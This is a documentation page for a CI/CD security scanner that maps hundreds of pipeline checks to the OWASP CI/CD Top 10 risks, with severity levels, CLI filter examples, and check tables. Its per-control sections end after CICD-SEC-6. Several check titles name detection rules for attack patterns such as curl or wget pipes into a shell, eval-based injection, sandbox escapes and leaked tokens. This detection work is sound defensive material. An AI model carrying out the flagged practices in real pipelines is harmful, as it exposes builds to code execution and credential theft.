Skip to content

OWASP Top 10 CI/CD Security Risks

The OWASP CI/CD Top 10 is the canonical risk taxonomy this scanner organizes around. Every other compliance standard's check set is a subset of OWASP's; the cross-standard integrity test in tests/test_standards.py enforces it. If a check fails, it is because at least one OWASP risk fires, the other 13 frameworks layer their own labels on top of the same evidence.

Use this page when you want full coverage of the canonical CI/CD risk model; pick a more specialized framework (NIST SSDF, SLSA, CIS Kubernetes, …) when an audit asks for that framework's vocabulary.

At a glance

  • Controls in this standard: 10
  • Controls evidenced by at least one check: 10 / 10
  • Distinct checks evidencing this standard: 485
  • Of those, autofixable with --fix: 111

How to read severity

Every check below ships at a fixed severity level. The scale is the same across providers and standards so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.

Level What it means Examples
CRITICAL Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. Hardcoded credential literal, branch ref pointing at a known-compromised action, signed-into-an-unverified registry.
HIGH Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod.
MEDIUM Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window.
LOW Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push.
INFO Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed.

Coverage by control

Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).

Control Title Checks Severity mix
CICD-SEC-1 Insufficient Flow Control Mechanisms 47 2C · 23H · 20M · 2L
CICD-SEC-2 Inadequate Identity and Access Management 30 2C · 17H · 10M · 1L
CICD-SEC-3 Dependency Chain Abuse 125 1C · 64H · 46M · 14L
CICD-SEC-4 Poisoned Pipeline Execution 72 20C · 40H · 10M · 2L
CICD-SEC-5 Insufficient PBAC 21 3C · 13H · 5M
CICD-SEC-6 Insufficient Credential Hygiene 57 25C · 18H · 14M
CICD-SEC-7 Insecure System Configuration 87 22C · 27H · 31M · 7L
CICD-SEC-8 Ungoverned Usage of 3rd-Party Services 8 4C · 2H · 2M
CICD-SEC-9 Improper Artifact Integrity Validation 62 1C · 12H · 43M · 6L
CICD-SEC-10 Insufficient Logging and Visibility 42 3H · 12M · 11L · 16I

Filter at runtime

Restrict a scan to checks that evidence this standard with --standard owasp_cicd_top_10:

# All providers, only checks tied to this standard
pipeline_check --standard owasp_cicd_top_10

# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard owasp_cicd_top_10

# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard owasp_cicd_top_10 --standard nist_ssdf

Controls in scope

CICD-SEC-1: Insufficient Flow Control Mechanisms

Reviews, approvals, branch protection, and deployment gates are the brakes on the pipeline. Missing them lets a single commit, or a single API call, ship straight to production.

Evidenced by 47 checks across 12 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Drone CI, GitHub Actions, GitLab CI, Jenkins, SCM, Tekton).

Check Title Severity Provider Fix
ADO-004 Deployment job missing environment binding MEDIUM Azure DevOps
ARGO-005 Argo input parameter interpolated unsafely in script / args CRITICAL Argo Workflows
BB-004 Deploy step missing deployment: environment gate MEDIUM Bitbucket
BK-004 Remote script piped into shell interpreter HIGH Buildkite 🔧 fix
BK-013 Deploy step has no branches: filter MEDIUM Buildkite
BK-015 agents map interpolates attacker-controllable Buildkite variable HIGH Buildkite
CB-007 CodeBuild webhook has no filter group MEDIUM AWS
CC-009 Deploy job missing manual approval gate MEDIUM CircleCI
CC-013 Deploy job in workflow has no branch filter MEDIUM CircleCI
CCM-001 CodeCommit repository has no approval rule template attached HIGH AWS
CD-001 Automatic rollback on failure not enabled MEDIUM AWS
CD-002 AllAtOnce deployment config, no canary or rolling strategy HIGH AWS
CP-001 No approval action before deploy stages HIGH AWS
CP-005 Production Deploy stage has no preceding ManualApproval MEDIUM AWS
DR-003 Untrusted Drone template variable in shell command HIGH Drone CI
DR-006 TLS verification disabled in step commands HIGH Drone CI
DR-009 Cache plugin key embeds an attacker-controllable Drone variable HIGH Drone CI
DR-011 node map interpolates attacker-controllable Drone variable HIGH Drone CI
GHA-014 Deploy job missing environment binding MEDIUM GitHub Actions 🔧 fix
GL-004 Deploy job lacks manual approval or environment gate MEDIUM GitLab CI
GL-029 Manual deploy job defaults to allow_failure: true MEDIUM GitLab CI
GL-033 Global before_script / after_script propagates taint to every job HIGH GitLab CI
JF-005 Deploy stage missing manual input approval MEDIUM Jenkins
JF-024 input approval step missing submitter restriction MEDIUM Jenkins
SCM-001 Default branch has no protection rule HIGH SCM
SCM-002 Default branch protection does not require pull request reviews HIGH SCM
SCM-006 Default branch protection does not require signed commits MEDIUM SCM
SCM-007 Default branch protection allows force-pushes HIGH SCM
SCM-008 Default branch protection does not require status checks MEDIUM SCM
SCM-009 Default branch protection allows branch deletion HIGH SCM
SCM-010 Branch protection allows administrators to bypass HIGH SCM
SCM-011 Default branch protection does not require CODEOWNERS reviews MEDIUM SCM
SCM-012 Default branch protection keeps stale reviews after a push MEDIUM SCM
SCM-013 Default branch protection does not require conversation resolution LOW SCM
SCM-014 Default branch protection does not require approval of the most recent push MEDIUM SCM
SCM-017 Repository has no CODEOWNERS file MEDIUM SCM
SCM-018 Required PR reviews can be bypassed by named identities MEDIUM SCM
SCM-019 Push restrictions allowlist names individual users LOW SCM
TAINT-001 Untrusted input flows across step boundaries via step outputs HIGH GitHub Actions
TAINT-002 Untrusted input flows across jobs via jobs.<id>.outputs: HIGH GitHub Actions
TAINT-003 Untrusted input forwarded into reusable workflow with: HIGH GitHub Actions
TAINT-004 Untrusted input flows across jobs via dotenv artifact HIGH GitLab CI
TAINT-005 Untrusted input flows across steps via buildkite-agent meta-data HIGH Buildkite
TAINT-006 Untrusted input flows across tasks via Tekton results HIGH Tekton
TAINT-007 Untrusted input flows across templates via Argo outputs.parameters HIGH Argo Workflows
TAINT-008 Untrusted input flows via GitLab extends: template inheritance HIGH GitLab CI
TKN-003 Tekton param interpolated unsafely in step script CRITICAL Tekton

CICD-SEC-2: Inadequate Identity and Access Management

Long-lived static credentials, shared service accounts, and human identities reused for automation collapse the blast radius of a single compromise to the whole pipeline.

Evidenced by 30 checks across 12 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Kubernetes, OCI manifest, Tekton).

Check Title Severity Provider Fix
ADO-029 Service-connection-using job without environment or branch gate HIGH Azure DevOps
ARGO-003 Argo workflow uses the default ServiceAccount MEDIUM Argo Workflows
ARGO-013 Argo workflow does not opt out of SA token automount MEDIUM Argo Workflows
ATTEST-001 SLSA provenance attests an untrusted builder identity HIGH OCI manifest
BB-028 OIDC step without deployment-gated environment HIGH Bitbucket
BK-007 Deploy step not gated by a manual block / input MEDIUM Buildkite
CA-004 CodeArtifact repo policy grants codeartifact: with Resource '' HIGH AWS
CC-031 OIDC role assumption without branch filter or approval gate HIGH CircleCI
GCB-002 Cloud Build uses the default service account HIGH Cloud Build
GCB-020 serviceAccount points at the default Cloud Build service account HIGH Cloud Build
GHA-030 OIDC token requested without environment-protected job HIGH GitHub Actions
GHA-034 Reusable workflow called with secrets: inherit MEDIUM GitHub Actions 🔧 fix
GL-031 id_tokens: missing audience pin or environment binding HIGH GitLab CI
IAM-001 CI/CD role has AdministratorAccess policy attached CRITICAL AWS
IAM-002 CI/CD role has wildcard Action in attached policy HIGH AWS
IAM-003 CI/CD role has no permission boundary MEDIUM AWS
IAM-004 CI/CD role can PassRole to any role HIGH AWS
IAM-005 CI/CD role trust policy missing sts:ExternalId HIGH AWS
IAM-006 Sensitive actions granted with wildcard Resource MEDIUM AWS
IAM-008 OIDC-federated role trust policy missing audience or subject pin HIGH AWS
K8S-011 Pod serviceAccountName unset or 'default' MEDIUM Kubernetes
K8S-012 Pod automountServiceAccountToken not false MEDIUM Kubernetes
K8S-019 Workload deployed in the 'default' namespace LOW Kubernetes
K8S-020 ClusterRoleBinding grants cluster-admin or system:masters CRITICAL Kubernetes 🔧 fix
K8S-021 Role or ClusterRole grants wildcard verbs+resources HIGH Kubernetes
K8S-025 System priority class used outside kube-system HIGH Kubernetes
K8S-029 RoleBinding grants permissions to the default ServiceAccount HIGH Kubernetes 🔧 fix
K8S-034 ServiceAccount automountServiceAccountToken not explicitly false MEDIUM Kubernetes
KMS-002 KMS key policy grants wildcard KMS actions HIGH AWS
TKN-007 Tekton run uses the default ServiceAccount MEDIUM Tekton

CICD-SEC-3: Dependency Chain Abuse

Floating tags, range constraints, and unverified registries let an upstream maintainer compromise (or a typosquat) execute in your build the next time the dependency resolves.

Evidenced by 125 checks across 17 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, OCI manifest, SCM, Tekton).

Check Title Severity Provider Fix
ADO-001 Task reference not pinned to specific version HIGH Azure DevOps 🔧 fix
ADO-005 Container image not pinned to specific version HIGH Azure DevOps
ADO-009 Container image pinned by tag rather than sha256 digest LOW Azure DevOps
ADO-016 Remote script piped to shell interpreter HIGH Azure DevOps 🔧 fix
ADO-018 Package install from insecure source HIGH Azure DevOps 🔧 fix
ADO-020 No vulnerability scanning step MEDIUM Azure DevOps
ADO-021 Package install without lockfile enforcement MEDIUM Azure DevOps 🔧 fix
ADO-022 Dependency update command bypasses lockfile pins MEDIUM Azure DevOps 🔧 fix
ADO-023 TLS / certificate verification bypass HIGH Azure DevOps 🔧 fix
ADO-025 Cross-repo template not pinned to commit SHA HIGH Azure DevOps
ADO-028 Package install bypasses registry integrity (git / path / tarball source) MEDIUM Azure DevOps
ARGO-001 Argo template container image not pinned to a digest HIGH Argo Workflows
ARGO-008 Argo script source pipes remote install or disables TLS HIGH Argo Workflows 🔧 fix
ARGO-014 Argo template script runs unpinned package install MEDIUM Argo Workflows
ARGO-015 Input artifact pulls from an insecure (non-HTTPS) URL HIGH Argo Workflows
ATTEST-001 SLSA provenance attests an untrusted builder identity HIGH OCI manifest
ATTEST-002 SLSA provenance source-repo claim is missing or unverifiable HIGH OCI manifest
ATTEST-003 SBOM contains floating-version dependencies MEDIUM OCI manifest
BB-001 pipe: action not pinned to exact version HIGH Bitbucket 🔧 fix
BB-009 pipe: pinned by version rather than sha256 digest LOW Bitbucket
BB-012 Remote script piped to shell interpreter HIGH Bitbucket 🔧 fix
BB-014 Package install from insecure source HIGH Bitbucket 🔧 fix
BB-015 No vulnerability scanning step MEDIUM Bitbucket
BB-021 Package install without lockfile enforcement MEDIUM Bitbucket 🔧 fix
BB-022 Dependency update command bypasses lockfile pins MEDIUM Bitbucket 🔧 fix
BB-023 TLS / certificate verification bypass HIGH Bitbucket 🔧 fix
BB-027 Package install bypasses registry integrity (git / path / tarball source) MEDIUM Bitbucket
BB-029 image: (step or service) not pinned by sha256 digest HIGH Bitbucket
BK-001 Buildkite plugin not pinned to an exact version HIGH Buildkite
BK-004 Remote script piped into shell interpreter HIGH Buildkite 🔧 fix
BK-008 TLS verification disabled in step command MEDIUM Buildkite 🔧 fix
BK-014 Step commands run unpinned package installs MEDIUM Buildkite
CA-002 CodeArtifact repository has a public external connection HIGH AWS
CB-009 CodeBuild image not pinned by digest MEDIUM AWS
CC-001 Orb not pinned to exact semver HIGH CircleCI 🔧 fix
CC-003 Docker image not pinned by digest HIGH CircleCI
CC-016 Remote script piped to shell interpreter HIGH CircleCI 🔧 fix
CC-018 Package install from insecure source HIGH CircleCI 🔧 fix
CC-020 No vulnerability scanning step MEDIUM CircleCI
CC-021 Package install without lockfile enforcement MEDIUM CircleCI 🔧 fix
CC-022 Dependency update command bypasses lockfile pins MEDIUM CircleCI 🔧 fix
CC-023 TLS / certificate verification bypass HIGH CircleCI 🔧 fix
CC-028 Package install bypasses registry integrity (git / path / tarball source) MEDIUM CircleCI
CC-029 Machine executor image not pinned HIGH CircleCI
DF-001 FROM image not pinned to sha256 digest HIGH Dockerfile 🔧 fix
DF-003 ADD pulls remote URL without integrity verification HIGH Dockerfile
DF-004 RUN executes a remote script via curl-pipe / wget-pipe HIGH Dockerfile
DF-009 ADD used where COPY would suffice LOW Dockerfile
DF-010 apt-get dist-upgrade / upgrade pulls unknown package versions LOW Dockerfile
DF-016 Image lacks OCI provenance labels LOW Dockerfile
DR-001 Step image not pinned to a digest HIGH Drone CI
DR-005 Plugin step uses a floating image tag HIGH Drone CI
DR-006 TLS verification disabled in step commands HIGH Drone CI
DR-008 Step uses pull: never (skips registry verification) MEDIUM Drone CI
DR-009 Cache plugin key embeds an attacker-controllable Drone variable HIGH Drone CI
DR-010 Step commands run unpinned package installs MEDIUM Drone CI
ECR-001 Image scanning on push not enabled HIGH AWS
ECR-006 ECR pull-through cache rule uses an untrusted upstream HIGH AWS
ECR-007 Inspector v2 enhanced scanning disabled for ECR MEDIUM AWS
GCB-001 Cloud Build step image not pinned by digest HIGH Cloud Build 🔧 fix
GCB-008 No vulnerability scanning step in Cloud Build pipeline MEDIUM Cloud Build
GCB-010 Remote script piped to shell interpreter HIGH Cloud Build
GCB-011 TLS / certificate verification bypass HIGH Cloud Build 🔧 fix
GCB-013 Package install bypasses registry integrity (git / path / tarball) MEDIUM Cloud Build
GCB-017 Image-producing build does not request SLSA provenance MEDIUM Cloud Build
GHA-001 Action not pinned to commit SHA HIGH GitHub Actions 🔧 fix
GHA-016 Remote script piped to shell interpreter HIGH GitHub Actions 🔧 fix
GHA-018 Package install from insecure source HIGH GitHub Actions 🔧 fix
GHA-020 No vulnerability scanning step MEDIUM GitHub Actions
GHA-021 Package install without lockfile enforcement MEDIUM GitHub Actions 🔧 fix
GHA-022 Dependency update command bypasses lockfile pins MEDIUM GitHub Actions 🔧 fix
GHA-023 TLS / certificate verification bypass HIGH GitHub Actions 🔧 fix
GHA-025 Reusable workflow not pinned to commit SHA HIGH GitHub Actions
GHA-029 Package install bypasses registry integrity (git / path / tarball source) MEDIUM GitHub Actions
GHA-040 Action reference matches a known-compromised SHA or tag CRITICAL GitHub Actions
GHA-041 Action upstream repo has a single contributor MEDIUM GitHub Actions
GHA-042 Action upstream repo is newly created MEDIUM GitHub Actions
GHA-043 Low-star action runs with sensitive permissions HIGH GitHub Actions
GHA-047 Action ref resolves to a recently committed tag or SHA MEDIUM GitHub Actions
GL-001 Image not pinned to specific version or digest HIGH GitLab CI 🔧 fix
GL-005 include: pulls remote / project without pinned ref HIGH GitLab CI
GL-009 Image pinned to version tag rather than sha256 digest LOW GitLab CI
GL-016 Remote script piped to shell interpreter HIGH GitLab CI 🔧 fix
GL-018 Package install from insecure source HIGH GitLab CI 🔧 fix
GL-019 No vulnerability scanning step MEDIUM GitLab CI
GL-021 Package install without lockfile enforcement MEDIUM GitLab CI 🔧 fix
GL-022 Dependency update command bypasses lockfile pins MEDIUM GitLab CI 🔧 fix
GL-023 TLS / certificate verification bypass HIGH GitLab CI 🔧 fix
GL-027 Package install bypasses registry integrity (git / path / tarball source) MEDIUM GitLab CI
GL-028 services: image not pinned HIGH GitLab CI
GL-030 trigger: include: pulls child pipeline without pinned ref HIGH GitLab CI
HELM-001 Chart.yaml declares legacy apiVersion: v1 MEDIUM Helm 🔧 fix
HELM-002 Chart.lock missing per-dependency digests HIGH Helm 🔧 fix
HELM-003 Chart dependency declared on a non-HTTPS repository HIGH Helm 🔧 fix
HELM-004 Chart dependency version is a range, not an exact pin MEDIUM Helm
HELM-005 Chart maintainers field empty or missing chain-of-custody info LOW Helm
HELM-006 Chart.yaml does not declare a kubeVersion compatibility range LOW Helm
HELM-007 Chart.yaml description field is empty or missing LOW Helm
HELM-008 Chart.lock generated more than 90 days ago MEDIUM Helm
HELM-009 Chart home / sources URL uses a non-HTTPS scheme LOW Helm
HELM-010 Chart.yaml appVersion field is empty or missing LOW Helm
JF-001 Shared library not pinned to a tag or commit HIGH Jenkins
JF-009 Agent docker image not pinned to sha256 digest HIGH Jenkins
JF-012 load step pulls Groovy from disk without integrity pin MEDIUM Jenkins
JF-016 Remote script piped to shell interpreter HIGH Jenkins 🔧 fix
JF-018 Package install from insecure source HIGH Jenkins 🔧 fix
JF-020 No vulnerability scanning step MEDIUM Jenkins
JF-021 Package install without lockfile enforcement MEDIUM Jenkins 🔧 fix
JF-022 Dependency update command bypasses lockfile pins MEDIUM Jenkins 🔧 fix
JF-023 TLS / certificate verification bypass HIGH Jenkins 🔧 fix
JF-031 Package install bypasses registry integrity (git / path / tarball source) MEDIUM Jenkins
K8S-001 Container image not pinned by sha256 digest HIGH Kubernetes 🔧 fix
K8S-036 ServiceAccount imagePullSecrets references missing Secret MEDIUM Kubernetes
OCI-001 Image manifest is missing OCI provenance annotations MEDIUM OCI manifest
OCI-002 Image is missing a build attestation manifest HIGH OCI manifest
OCI-003 Image manifest is missing the image.created annotation LOW OCI manifest
OCI-004 Image layer references an arbitrary URL (foreign layer) HIGH OCI manifest
OCI-005 Image manifest is missing the image.licenses annotation LOW OCI manifest
OCI-006 Image has an excessive layer count LOW OCI manifest
OCI-007 Image manifest uses legacy schemaVersion 1 (no content addressing) HIGH OCI manifest
OCI-008 Manifest references digest using unsupported hash algorithm HIGH OCI manifest
SCM-005 Dependabot security updates are not enabled MEDIUM SCM
TKN-001 Tekton step image not pinned to a digest HIGH Tekton
TKN-008 Tekton step script pipes remote install or disables TLS HIGH Tekton 🔧 fix
TKN-014 Tekton step script runs unpinned package install MEDIUM Tekton

CICD-SEC-4: Poisoned Pipeline Execution

An attacker who can influence what a build runs, via a PR, an issue comment, or a tainted environment variable, executes with the build's secrets and write-access to your artifacts.

Evidenced by 72 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Jenkins, Tekton).

Check Title Severity Provider Fix
ADO-002 Script injection via attacker-controllable context HIGH Azure DevOps
ADO-010 Cross-pipeline download: ingestion unverified CRITICAL Azure DevOps
ADO-011 template: <local-path> on PR-validated pipeline HIGH Azure DevOps
ADO-012 Cache@2 key derives from $(System.PullRequest.*) MEDIUM Azure DevOps
ADO-019 extends: template on PR-validated pipeline points to local path CRITICAL Azure DevOps
ADO-026 Pipeline contains indicators of malicious activity CRITICAL Azure DevOps
ADO-027 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Azure DevOps
ARGO-005 Argo input parameter interpolated unsafely in script / args CRITICAL Argo Workflows
BB-002 Script injection via attacker-controllable context HIGH Bitbucket
BB-010 Deploy step ingests pull-request artifact unverified CRITICAL Bitbucket
BB-018 Cache key derives from attacker-controllable input MEDIUM Bitbucket
BB-025 Pipeline contains indicators of malicious activity CRITICAL Bitbucket
BB-026 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Bitbucket
BK-003 Untrusted Buildkite variable interpolated in command HIGH Buildkite
CB-008 CodeBuild buildspec is inline (not sourced from a protected repo) HIGH AWS
CB-010 CodeBuild webhook allows fork-PR builds without actor filtering HIGH AWS
CB-011 CodeBuild buildspec contains indicators of malicious activity CRITICAL AWS
CC-002 Script injection via untrusted environment variable HIGH CircleCI
CC-012 Dynamic config via setup: true enables code injection MEDIUM CircleCI
CC-025 Cache key derives from attacker-controllable input MEDIUM CircleCI
CC-026 Config contains indicators of malicious activity CRITICAL CircleCI
CC-027 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH CircleCI
CP-003 Source stage using polling instead of event-driven trigger LOW AWS
CP-007 CodePipeline v2 PR trigger accepts all branches HIGH AWS
DF-005 RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH Dockerfile
DR-003 Untrusted Drone template variable in shell command HIGH Drone CI
GCB-004 dynamicSubstitutions on with user substitutions in step args HIGH Cloud Build
GCB-006 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Cloud Build
GCB-016 Step dir field contains parent-directory escape (..) MEDIUM Cloud Build
GCB-019 Shell entrypoint inlines a user substitution into args HIGH Cloud Build
GCB-022 options.substitutionOption set to ALLOW_LOOSE LOW Cloud Build 🔧 fix
GCB-023 Step references a user substitution not declared in substitutions: MEDIUM Cloud Build
GCB-026 Step waitFor: references an unknown step id MEDIUM Cloud Build
GHA-002 pull_request_target checks out PR head CRITICAL GitHub Actions 🔧 fix
GHA-003 Script injection via untrusted context HIGH GitHub Actions 🔧 fix
GHA-009 workflow_run downloads upstream artifact unverified CRITICAL GitHub Actions
GHA-010 Local action (./path) on untrusted-trigger workflow HIGH GitHub Actions
GHA-011 Cache key derives from attacker-controllable input MEDIUM GitHub Actions
GHA-013 issue_comment trigger without author guard HIGH GitHub Actions
GHA-027 Workflow contains indicators of malicious activity CRITICAL GitHub Actions
GHA-028 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH GitHub Actions
GHA-031 Workflow uses retired set-output / save-state command HIGH GitHub Actions
GHA-032 run: invokes local script on untrusted-trigger workflow CRITICAL GitHub Actions
GHA-035 github-script step interpolates untrusted context HIGH GitHub Actions
GHA-037 actions/checkout persists GITHUB_TOKEN into .git/config HIGH GitHub Actions
GHA-038 Workflow re-enables retired ::set-env / ::add-path commands CRITICAL GitHub Actions
GHA-044 Build tool runs lifecycle scripts on untrusted-trigger workflow HIGH GitHub Actions
GHA-045 Caller-controlled ref input feeds actions/checkout HIGH GitHub Actions
GHA-046 Manual PR-head fetch on untrusted-trigger workflow CRITICAL GitHub Actions
GL-002 Script injection via untrusted commit/MR context HIGH GitLab CI
GL-010 Multi-project pipeline ingests upstream artifact unverified CRITICAL GitLab CI
GL-011 include: local file pulled in MR-triggered pipeline HIGH GitLab CI
GL-012 Cache key derives from MR-controlled CI variable MEDIUM GitLab CI
GL-025 Pipeline contains indicators of malicious activity CRITICAL GitLab CI
GL-026 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH GitLab CI
GL-033 Global before_script / after_script propagates taint to every job HIGH GitLab CI
JF-002 Script step interpolates attacker-controllable env var HIGH Jenkins
JF-013 copyArtifacts ingests another job's output unverified CRITICAL Jenkins
JF-019 Groovy sandbox escape pattern detected CRITICAL Jenkins
JF-026 build job: trigger ignores downstream failure MEDIUM Jenkins
JF-029 Jenkinsfile contains indicators of malicious activity CRITICAL Jenkins
JF-030 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Jenkins
TAINT-001 Untrusted input flows across step boundaries via step outputs HIGH GitHub Actions
TAINT-002 Untrusted input flows across jobs via jobs.<id>.outputs: HIGH GitHub Actions
TAINT-003 Untrusted input forwarded into reusable workflow with: HIGH GitHub Actions
TAINT-004 Untrusted input flows across jobs via dotenv artifact HIGH GitLab CI
TAINT-005 Untrusted input flows across steps via buildkite-agent meta-data HIGH Buildkite
TAINT-006 Untrusted input flows across tasks via Tekton results HIGH Tekton
TAINT-007 Untrusted input flows across templates via Argo outputs.parameters HIGH Argo Workflows
TAINT-008 Untrusted input flows via GitLab extends: template inheritance HIGH GitLab CI
TKN-003 Tekton param interpolated unsafely in step script CRITICAL Tekton
TKN-015 Workspace subPath interpolates a Task parameter (path traversal) HIGH Tekton

CICD-SEC-5: Insufficient PBAC

Build steps with deploy-class permissions, jobs sharing a single broad role, and missing environment gates each let a routine compromise escalate from build to production.

Evidenced by 21 checks across 9 providers (AWS, Argo Workflows, Buildkite, CircleCI, Drone CI, GitHub Actions, Jenkins, Kubernetes, Tekton).

Check Title Severity Provider Fix
ARGO-002 Argo template container runs privileged or as root HIGH Argo Workflows
ARGO-004 Argo workflow mounts hostPath or shares host namespaces CRITICAL Argo Workflows
BK-005 Container started with --privileged or host-bind escalation HIGH Buildkite 🔧 fix
CC-014 Job missing resource_class declaration MEDIUM CircleCI
DR-002 Step runs with privileged: true HIGH Drone CI
DR-007 Step mounts a sensitive host path HIGH Drone CI
GHA-004 Workflow has no explicit permissions block MEDIUM GitHub Actions 🔧 fix
GHA-043 Low-star action runs with sensitive permissions HIGH GitHub Actions
JF-003 Pipeline uses agent any (no executor isolation) MEDIUM Jenkins
K8S-020 ClusterRoleBinding grants cluster-admin or system:masters CRITICAL Kubernetes 🔧 fix
K8S-021 Role or ClusterRole grants wildcard verbs+resources HIGH Kubernetes
K8S-025 System priority class used outside kube-system HIGH Kubernetes
K8S-029 RoleBinding grants permissions to the default ServiceAccount HIGH Kubernetes 🔧 fix
PBAC-001 CodeBuild project has no VPC configuration HIGH AWS
PBAC-002 CodeBuild service role shared across multiple projects MEDIUM AWS
PBAC-003 CodeBuild security group allows 0.0.0.0/0 all-port egress MEDIUM AWS
PBAC-005 CodePipeline stage action roles mirror the pipeline role HIGH AWS
TKN-002 Tekton step runs privileged or as root HIGH Tekton
TKN-004 Tekton Task mounts hostPath or shares host namespaces CRITICAL Tekton
TKN-013 Tekton sidecar runs privileged or as root HIGH Tekton
TKN-015 Workspace subPath interpolates a Task parameter (path traversal) HIGH Tekton

CICD-SEC-6: Insufficient Credential Hygiene

Plaintext secrets in YAML, env vars baked into image layers, or tokens echoed to logs all leak credentials before they're ever exploited; rotation only helps if the leak is detected.

Evidenced by 57 checks across 17 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, CloudFormation, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Jenkins, Kubernetes, SCM, Tekton, Terraform).

Check Title Severity Provider Fix
ADO-003 Variables contain literal secret values CRITICAL Azure DevOps
ADO-008 Credential-shaped literal in pipeline body CRITICAL Azure DevOps 🔧 fix
ADO-014 AWS auth uses long-lived access keys MEDIUM Azure DevOps 🔧 fix
ARGO-006 Literal secret value in Argo template env or parameter default CRITICAL Argo Workflows 🔧 fix
BB-003 Variables contain literal secret values CRITICAL Bitbucket
BB-008 Credential-shaped literal in pipeline body CRITICAL Bitbucket 🔧 fix
BB-011 AWS auth uses long-lived access keys MEDIUM Bitbucket 🔧 fix
BB-017 Repository token written to persistent storage CRITICAL Bitbucket 🔧 fix
BB-019 after-script references secrets HIGH Bitbucket
BK-002 Literal secret value in pipeline env block CRITICAL Buildkite 🔧 fix
CB-001 Secrets in plaintext environment variables CRITICAL AWS
CB-006 CodeBuild source auth uses long-lived token HIGH AWS
CC-004 Secret-like environment variable not managed via context MEDIUM CircleCI
CC-005 AWS auth uses long-lived access keys in environment block MEDIUM CircleCI 🔧 fix
CC-008 Credential-shaped literal in config body CRITICAL CircleCI 🔧 fix
CC-019 add_ssh_keys without fingerprint restriction HIGH CircleCI
CC-030 Workflow job uses context without branch filter or approval gate MEDIUM CircleCI
CF-001 Inline credential parameter on a CloudFormation resource HIGH CloudFormation
CF-002 CloudFormation parameter declares a default secret value HIGH CloudFormation
CP-004 Legacy ThirdParty/GitHub source action (OAuth token) HIGH AWS
DF-006 ENV or ARG carries a credential-shaped literal value CRITICAL Dockerfile
DF-019 COPY/ADD source path looks like a credential file HIGH Dockerfile 🔧 fix
DF-020 ARG declares a credential-named build argument HIGH Dockerfile 🔧 fix
DR-004 Literal credential in step environment / settings CRITICAL Drone CI
GCB-003 Secret Manager value referenced in step args HIGH Cloud Build
GCB-007 availableSecrets references versions/latest MEDIUM Cloud Build 🔧 fix
GCB-012 Credential-shaped literal in pipeline body CRITICAL Cloud Build
GCB-018 Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM Cloud Build
GHA-005 AWS auth uses long-lived access keys MEDIUM GitHub Actions 🔧 fix
GHA-008 Credential-shaped literal in workflow body CRITICAL GitHub Actions 🔧 fix
GHA-019 GITHUB_TOKEN written to persistent storage CRITICAL GitHub Actions 🔧 fix
GHA-033 Secret value echoed / printed in a run: block CRITICAL GitHub Actions
GHA-034 Reusable workflow called with secrets: inherit MEDIUM GitHub Actions 🔧 fix
GHA-037 actions/checkout persists GITHUB_TOKEN into .git/config HIGH GitHub Actions
GHA-039 services / container credentials embedded as literal in workflow CRITICAL GitHub Actions
GL-003 Variables contain literal secret values CRITICAL GitLab CI
GL-008 Credential-shaped literal in pipeline body CRITICAL GitLab CI 🔧 fix
GL-013 AWS auth uses long-lived access keys MEDIUM GitLab CI 🔧 fix
GL-020 CI_JOB_TOKEN written to persistent storage CRITICAL GitLab CI 🔧 fix
IAM-007 IAM user has access key older than 90 days HIGH AWS
JF-004 AWS auth uses long-lived access keys via withCredentials MEDIUM Jenkins 🔧 fix
JF-008 Credential-shaped literal in pipeline body CRITICAL Jenkins 🔧 fix
JF-010 Long-lived AWS keys exposed via environment {} block HIGH Jenkins 🔧 fix
K8S-012 Pod automountServiceAccountToken not false MEDIUM Kubernetes
K8S-017 Container env value carries a credential-shaped literal CRITICAL Kubernetes
K8S-018 Secret stringData/data carries a credential-shaped literal CRITICAL Kubernetes
K8S-037 ConfigMap data carries a credential-shaped literal HIGH Kubernetes
KMS-001 KMS customer-managed key has rotation disabled MEDIUM AWS
LMB-003 Lambda function env vars may contain plaintext secrets HIGH AWS
SCM-004 GitHub secret scanning is not enabled HIGH SCM
SCM-006 Default branch protection does not require signed commits MEDIUM SCM
SCM-015 Secret scanning push protection is not enabled HIGH SCM
SM-001 Secrets Manager secret has no rotation configured HIGH AWS
SSM-001 SSM Parameter with secret-like name is not a SecureString HIGH AWS
TF-001 aws_iam_access_key declares a long-lived access key CRITICAL Terraform
TF-002 Resource attribute carries a hard-coded secret shape CRITICAL Terraform
TKN-005 Literal secret value in Tekton step env or param default CRITICAL Tekton 🔧 fix

